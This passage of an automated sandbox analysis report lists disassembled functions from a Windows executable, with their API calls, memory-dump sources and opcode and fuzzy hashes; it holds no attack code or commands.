                                                                                      • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                      • Instruction Fuzzy Hash: FDC1D7762050530ADF2D463995300BFBEA15AA17B131A03BFD8B7CB2D1FE28D5AED514
                                                                                      Function 0041EE46 Relevance: .3, Instructions: 323COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                      • Instruction ID: 3e224d2f89dbc42940f28cbde2f34442bcd9805f04d32d669e3e16412bb561ab
                                                                                      • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                      • Instruction Fuzzy Hash: 52C1E5762050530ADF2D463AC5300BFBFA15AA17B130A07BFD8B6CB2D4FE28D5AAC514
                                                                                      Function 0040D5E4 Relevance: .3, Instructions: 318COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e504dd273049bafc7f0c901e4a6f642f893d111b001588ce11184cff821c1fd4
                                                                                      • Instruction ID: a2b5664e868fa41287ba6a6489a868971e3799b81f66d6990a2117180280fbf5
                                                                                      • Opcode Fuzzy Hash: e504dd273049bafc7f0c901e4a6f642f893d111b001588ce11184cff821c1fd4
                                                                                      • Instruction Fuzzy Hash: 66E128795093808FC344CF69D89086ABBF0AFDA300F49596EF9D5973A2C234E915CF66
                                                                                      Function 00412DB5 Relevance: .3, Instructions: 263COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 258a2619ca224506e2ce8481b4959e2ad5c6699b1b0424d45743f46b69a4843c
                                                                                      • Instruction ID: 244d674acbb38c77deb971580ce4003f415b56e3b292358df552db74092bc2b1
                                                                                      • Opcode Fuzzy Hash: 258a2619ca224506e2ce8481b4959e2ad5c6699b1b0424d45743f46b69a4843c
                                                                                      • Instruction Fuzzy Hash: 8D9179B02007498BDB24EF24DA94BFE77D5AB54304F10092FE596C72C2DBBC95A5C74A
                                                                                      Function 00422B78 Relevance: .2, Instructions: 237COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0be99bfb04495bc4c7ebd387d24a70e01dfc56760af593cd131e7a5f01d29cbc
                                                                                      • Instruction ID: 1249433b07344169fa31d21dbc8f5dfd3480a860939a117a477193e62b87ecc1
                                                                                      • Opcode Fuzzy Hash: 0be99bfb04495bc4c7ebd387d24a70e01dfc56760af593cd131e7a5f01d29cbc
                                                                                      • Instruction Fuzzy Hash: 5761657170063872DA385E2ABB557FF6394AF12704FD4091BE842DF391C6DDAD82821E
                                                                                      Function 004130E6 Relevance: .2, Instructions: 232COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9ea23a0b5be8d720a81cc3f877502472f5d544f68c9a06fa8112536a0a6d4999
                                                                                      • Instruction ID: a5f60a4d3041c1acd2c90cef9ceaa2a6117313380b0d2077d1a2d915a053eeba
                                                                                      • Opcode Fuzzy Hash: 9ea23a0b5be8d720a81cc3f877502472f5d544f68c9a06fa8112536a0a6d4999
                                                                                      • Instruction Fuzzy Hash: 3B7139703043459BDB24DE69C9C4BEE3791AB91309F10097FE9868B282DA7C9AC5875F
                                                                                      Function 0040D1D2 Relevance: .2, Instructions: 190COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0903cd41e1e859d94536f7af4f42260654ec781e1855a1d53fadf7962554de4e
                                                                                      • Instruction ID: 15e5258c66c873568865c5322a58e0f775568ceb781cf90132a69cdabdd8e106
                                                                                      • Opcode Fuzzy Hash: 0903cd41e1e859d94536f7af4f42260654ec781e1855a1d53fadf7962554de4e
                                                                                      • Instruction Fuzzy Hash: A6819F9651A2D49EC3064F7D38E12E53EA05777300B1D44FBD4C9962B3C03A85ADDB2A
                                                                                      Function 0040EC97 Relevance: .1, Instructions: 131COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9810cfe000e1410321e2e0ccb18bf2a63416319202e48a95f621da24956328a5
                                                                                      • Instruction ID: 8f65f2ee91a50910e615fe7f6bda12031b6d618235e9a4a7faf5034ab38a26c5
                                                                                      • Opcode Fuzzy Hash: 9810cfe000e1410321e2e0ccb18bf2a63416319202e48a95f621da24956328a5
                                                                                      • Instruction Fuzzy Hash: DA512671A083128FC748CF19D49055AF7E1FFC8314F058A2EE899A7740DB34E959CB9A
                                                                                      Function 00412B3A Relevance: .1, Instructions: 112COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 03d8200d211fb2155360bb18f1da6528e951efe338ec765a37701bdcb59cc893
                                                                                      • Instruction ID: b5f6b59eeae0f25cc972e16ad71cd3d8b5290be8fee6e33da3d1a32a9a5e3a1e
                                                                                      • Opcode Fuzzy Hash: 03d8200d211fb2155360bb18f1da6528e951efe338ec765a37701bdcb59cc893
                                                                                      • Instruction Fuzzy Hash: 923103B56087098FC714DF29C9512AEBBD0FB95304F00452EE4CAD7381D678E959CB96
                                                                                      Function 00405E96 Relevance: .1, Instructions: 76COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 83ae8c8df6adcd2d5a2bc2a9e5fe67d9f7ced7ae349f1b665aafe69c9f795551
                                                                                      • Instruction ID: 771e7ca1ca34478593514f16a995dd1efbae609535e1f2f732e810927c86a7c8
                                                                                      • Opcode Fuzzy Hash: 83ae8c8df6adcd2d5a2bc2a9e5fe67d9f7ced7ae349f1b665aafe69c9f795551
                                                                                      • Instruction Fuzzy Hash: 5821C832A201655BCB08CF2DECA44777761E786311786813BEE869B3D0C639E925CBE4
                                                                                      Function 0042958D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ___free_lconv_mon.LIBCMT ref: 004295D1
                                                                                        • Part of subcall function 0042916C: _free.LIBCMT ref: 00429189
                                                                                        • Part of subcall function 0042916C: _free.LIBCMT ref: 0042919B
                                                                                        • Part of subcall function 0042916C: _free.LIBCMT ref: 004291AD
                                                                                        • Part of subcall function 0042916C: _free.LIBCMT ref: 004291BF
                                                                                        • Part of subcall function 0042916C: _free.LIBCMT ref: 004291D1
                                                                                        • Part of subcall function 0042916C: _free.LIBCMT ref: 004291E3
                                                                                        • Part of subcall function 0042916C: _free.LIBCMT ref: 004291F5
                                                                                        • Part of subcall function 0042916C: _free.LIBCMT ref: 00429207
                                                                                        • Part of subcall function 0042916C: _free.LIBCMT ref: 00429219
                                                                                        • Part of subcall function 0042916C: _free.LIBCMT ref: 0042922B
                                                                                        • Part of subcall function 0042916C: _free.LIBCMT ref: 0042923D
                                                                                        • Part of subcall function 0042916C: _free.LIBCMT ref: 0042924F
                                                                                        • Part of subcall function 0042916C: _free.LIBCMT ref: 00429261
                                                                                      • _free.LIBCMT ref: 004295C6
                                                                                        • Part of subcall function 004259C2: RtlFreeHeap.NTDLL(00000000,00000000,?,00429301,?,00000000,?,00000000,?,00429328,?,00000007,?,?,00429725,?), ref: 004259D8
                                                                                        • Part of subcall function 004259C2: GetLastError.KERNEL32(?,?,00429301,?,00000000,?,00000000,?,00429328,?,00000007,?,?,00429725,?,?), ref: 004259EA
                                                                                      • _free.LIBCMT ref: 004295E8
                                                                                      • _free.LIBCMT ref: 004295FD
                                                                                      • _free.LIBCMT ref: 00429608
                                                                                      • _free.LIBCMT ref: 0042962A
                                                                                      • _free.LIBCMT ref: 0042963D
                                                                                      • _free.LIBCMT ref: 0042964B
                                                                                      • _free.LIBCMT ref: 00429656
                                                                                      • _free.LIBCMT ref: 0042968E
                                                                                      • _free.LIBCMT ref: 00429695
                                                                                      • _free.LIBCMT ref: 004296B2
                                                                                      • _free.LIBCMT ref: 004296CA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                      • String ID:
                                                                                      • API String ID: 161543041-0
                                                                                      • Opcode ID: ddf99c9c9d5db9075c479884fb3fabc3a8cdb2406a0ee533470bc44bd10d7cb7
                                                                                      • Instruction ID: b8dd5fac369160390c21bb2f498f9cdd240af4bf3fb0eb850aa3d630b33d73bd
                                                                                      • Opcode Fuzzy Hash: ddf99c9c9d5db9075c479884fb3fabc3a8cdb2406a0ee533470bc44bd10d7cb7
                                                                                      • Instruction Fuzzy Hash: 5D314BB1704721EFEB21AA39E845B5773E9AF04725F90842FE489D6251DF39EC908A18
                                                                                      Function 0041B8BC Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 80windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetWindow.USER32(?,00000005), ref: 0041B8DD
                                                                                      • GetClassNameW.USER32(00000000,?,00000800), ref: 0041B90C
                                                                                        • Part of subcall function 00410B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0040AC49,?,?,?,0040ABF8,?,-00000002,?,00000000,?), ref: 00410B28
                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0041B92A
                                                                                      • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0041B941
                                                                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 0041B954
                                                                                        • Part of subcall function 00418B22: GetDC.USER32(00000000), ref: 00418B2E
                                                                                        • Part of subcall function 00418B22: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00418B3D
                                                                                        • Part of subcall function 00418B22: ReleaseDC.USER32(00000000,00000000), ref: 00418B4B
                                                                                        • Part of subcall function 00418ADF: GetDC.USER32(00000000), ref: 00418AEB
                                                                                        • Part of subcall function 00418ADF: GetDeviceCaps.GDI32(00000000,00000058), ref: 00418AFA
                                                                                        • Part of subcall function 00418ADF: ReleaseDC.USER32(00000000,00000000), ref: 00418B08
                                                                                      • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0041B97B
                                                                                      • DeleteObject.GDI32(00000000), ref: 0041B982
                                                                                      • GetWindow.USER32(00000000,00000002), ref: 0041B98B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$CapsDeviceMessageObjectReleaseSend$ClassCompareDeleteLongNameString
                                                                                      • String ID: STATIC
                                                                                      • API String ID: 1444658586-1882779555
                                                                                      • Opcode ID: 9eb66c9b06f7794f8742c48d4074b7b7c382e76b88df8cadc74f07dc058f6ac8
                                                                                      • Instruction ID: 6318f8af78674f69d757836432dfb60febc7a598e2d349fe20b754675da3af8e
                                                                                      • Opcode Fuzzy Hash: 9eb66c9b06f7794f8742c48d4074b7b7c382e76b88df8cadc74f07dc058f6ac8
                                                                                      • Instruction Fuzzy Hash: AD21F6B25802147BE7206B65DC4AFEF762CEF04704F004026FA45A5191CB785D929AFE
                                                                                      Function 0042622B Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _free.LIBCMT ref: 0042623F
                                                                                        • Part of subcall function 004259C2: RtlFreeHeap.NTDLL(00000000,00000000,?,00429301,?,00000000,?,00000000,?,00429328,?,00000007,?,?,00429725,?), ref: 004259D8
                                                                                        • Part of subcall function 004259C2: GetLastError.KERNEL32(?,?,00429301,?,00000000,?,00000000,?,00429328,?,00000007,?,?,00429725,?,?), ref: 004259EA
                                                                                      • _free.LIBCMT ref: 0042624B
                                                                                      • _free.LIBCMT ref: 00426256
                                                                                      • _free.LIBCMT ref: 00426261
                                                                                      • _free.LIBCMT ref: 0042626C
                                                                                      • _free.LIBCMT ref: 00426277
                                                                                      • _free.LIBCMT ref: 00426282
                                                                                      • _free.LIBCMT ref: 0042628D
                                                                                      • _free.LIBCMT ref: 00426298
                                                                                      • _free.LIBCMT ref: 004262A6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                      • String ID:
                                                                                      • API String ID: 776569668-0
                                                                                      • Opcode ID: d620e558880fd8ce80d19ee0b511d0532b0a9c6db84da66ba2f2908d13ad584e
                                                                                      • Instruction ID: 702e7cae314b7838f4ebfcd6a8c9c60583ff0be3e49d1f3642f94e9ff5ca346b
                                                                                      • Opcode Fuzzy Hash: d620e558880fd8ce80d19ee0b511d0532b0a9c6db84da66ba2f2908d13ad584e
                                                                                      • Instruction Fuzzy Hash: B511A7B5300618FFCF01EF56D842CD93B75FF08765B8144AAB9884F222DA35EE909B44
                                                                                      Function 004020E6 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 480COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ;%u$x%u$xc%u
                                                                                      • API String ID: 0-2277559157
                                                                                      • Opcode ID: 78d7a46312c3dd2fb1f809b3a62e2a6d11d2cb618be9b88d302562a18ddb4ee8
                                                                                      • Instruction ID: 56b77deecd400c2c6aa0fe10f2b2a1c748cb41eabe8018d5530157625b778b2c
                                                                                      • Opcode Fuzzy Hash: 78d7a46312c3dd2fb1f809b3a62e2a6d11d2cb618be9b88d302562a18ddb4ee8
                                                                                      • Instruction Fuzzy Hash: 23F119716042409BDB14EB658999BEB7799AF91304F08057FEC85BB2C3CABC9844C76A
                                                                                      Function 0041995F Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 99windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 004012E7: GetDlgItem.USER32(00000000,00003021), ref: 0040132B
                                                                                        • Part of subcall function 004012E7: SetWindowTextW.USER32(00000000,004302E4), ref: 00401341
                                                                                      • EndDialog.USER32(?,00000001), ref: 004199AF
                                                                                      • SendMessageW.USER32(?,00000080,00000001,?), ref: 004199DC
                                                                                      • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 004199F1
                                                                                      • SetWindowTextW.USER32(?,?), ref: 00419A02
                                                                                      • GetDlgItem.USER32(?,00000065), ref: 00419A0B
                                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00419A1F
                                                                                      • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00419A31
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                      • String ID: LICENSEDLG
                                                                                      • API String ID: 3214253823-2177901306
                                                                                      • Opcode ID: 7945897e584cb2fab69148a99cd0f4339392004317e3f5e2573e0a3f361fcbf0
                                                                                      • Instruction ID: 48bdf7dd5227cb798e58377614996d90b5da2c8a0c46a3bd4511a5240f12fc20
                                                                                      • Opcode Fuzzy Hash: 7945897e584cb2fab69148a99cd0f4339392004317e3f5e2573e0a3f361fcbf0
                                                                                      • Instruction Fuzzy Hash: A2213E722402047BD5116B61ED85FBB7BADDF46B85F00002EF640B22A1CF6AAC41D67F
                                                                                      Function 00426552 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 305COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: __alldvrm$_strrchr
                                                                                      • String ID: N,B$N,B$N,B
                                                                                      • API String ID: 1036877536-2237543559
                                                                                      • Opcode ID: 2f430cb2a74aa859eafc5ddd4affd14cc97d35a892c3f37a2c0f3c52710f6d69
                                                                                      • Instruction ID: 451f5d2cef083e9312d0b1a47e80e7e623e6d1aeb807a09841bc7a4c4056b34c
                                                                                      • Opcode Fuzzy Hash: 2f430cb2a74aa859eafc5ddd4affd14cc97d35a892c3f37a2c0f3c52710f6d69
                                                                                      • Instruction Fuzzy Hash: D4A17771B003A69FE721DF18E891BAEBBA5EF55358F5641AFD4849B381C23C8C41C758
                                                                                      Function 0040922D Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 137fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00409232
                                                                                      • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00409255
                                                                                      • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00409274
                                                                                        • Part of subcall function 00410B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0040AC49,?,?,?,0040ABF8,?,-00000002,?,00000000,?), ref: 00410B28
                                                                                      • _swprintf.LIBCMT ref: 00409310
                                                                                        • Part of subcall function 00403F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00403F6E
